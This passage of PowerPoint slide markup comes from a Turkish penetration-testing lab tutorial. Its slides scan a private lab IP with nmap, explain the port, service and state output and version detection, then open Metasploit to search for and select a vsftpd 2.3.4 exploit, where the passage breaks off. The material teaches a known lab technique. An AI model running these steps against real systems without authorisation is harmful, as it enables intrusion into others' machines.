      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="190829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CF89F5-4C53-A5D5-96D3-68579097F29F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365126"/>
            <a:ext cx="10515600" cy="592138"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>10.0.2.5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="İçerik Yer Tutucusu 4" descr="metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C1A449E-8BF1-F7F8-E375-F7F0CA6D066E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="700088" y="957264"/>
            <a:ext cx="10653712" cy="5672135"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2729000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3AD59825-6186-7A4F-5246-3F5744F47F32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="512763" y="601662"/>
            <a:ext cx="6794500" cy="3340100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Resim 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{260F1ABB-6A3F-AAFF-2144-6F4AAE0DFCBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="512763" y="3941762"/>
            <a:ext cx="6794499" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Metin kutusu 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C1A5638-6B0F-CDF0-4D61-536A070F1919}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7558088" y="600075"/>
            <a:ext cx="4257675" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
          </a:ln>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tr-TR" sz="2400" b="1" u="sng" dirty="0">
                <a:ln/>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>PORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0">
                <a:ln/>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR"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Port numarasını ve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="24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Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR"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bilgisi verir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0">
                <a:ln/>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" sz="2400" b="1" dirty="0">
              <a:ln/>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" sz="2400" b="1" dirty="0">
              <a:ln/>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" u="sng" dirty="0">
                <a:ln/>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SERVICE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0">
                <a:ln/>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0">
                <a:ln/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Portun üzerinde çalışan servis bilgilerini verir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" sz="2400" b="1" dirty="0">
              <a:ln/>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" u="sng" dirty="0">
                <a:ln/>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>STATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0">
                <a:ln/>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0">
                <a:ln/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Portun durumunu(açık, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0" err="1">
                <a:ln/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>kapalı,filtreli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0">
                <a:ln/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0" err="1">
                <a:ln/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>filitresiz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0">
                <a:ln/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> cevapları döner.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Çerçeve 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9327556D-5568-8B01-180A-1326A2795379}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="512763" y="1800225"/>
            <a:ext cx="644525" cy="3143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0" name="Çerçeve 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A191C6D-F920-323D-059B-06F20D76F6CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1443038" y="1814513"/>
            <a:ext cx="657225" cy="314325"/>
          </a:xfrm>
          <a:prstGeom prst="fram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tr-TR">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Çerçeve 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE959874-B063-53A0-B26A-AC3F172B5742}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2087563" y="1814513"/>
            <a:ext cx="869950" cy="314325"/>
          </a:xfrm>
          <a:prstGeom prst="fra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1423628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4055F0B8-823A-8056-0429-ECA16AE4C7F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="170446" y="0"/>
            <a:ext cx="12021554" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Metin kutusu 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{672086A4-3594-6626-3C1D-CB621859733E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7729538" y="314325"/>
            <a:ext cx="4292016" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>parametresi ile servislerin Versiyon bilgilerini öğrenebiliriz.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2584659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172FF4EB-340A-DFED-132D-2D73F888FD2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="7945" r="17842"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="364918" y="218640"/>
            <a:ext cx="11827082" cy="633535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4" name="Metin kutusu 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9F0BB2A-C814-8F0C-6BFD-A3689D9F0159}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5328139" y="571500"/>
            <a:ext cx="6100763" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Terminale «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>» yazdığımızda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msfconsele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> çalışıyor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>use</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exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> yazarak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> içindeki </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>exploitleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> görebiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bize lazım olan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>exploiti</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search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> 2.3.4» yazarak aratıyoruz.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2705661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ekran görüntüsü, gümüş içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFB1709B-5FEB-5752-EFD4-E35141D03023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="136525" y="115886"/>
            <a:ext cx="11950700" cy="3109054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Metin kutusu 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B55C9284-D7D1-7BF2-ED84-15A8AF29E120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271463" y="3939315"/>
            <a:ext cx="10815637" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Şuan bize bulduğu zafiyeti ve kullanımını veren ekran karşımıza çıktı</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> 0 ﻿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0" err="1">
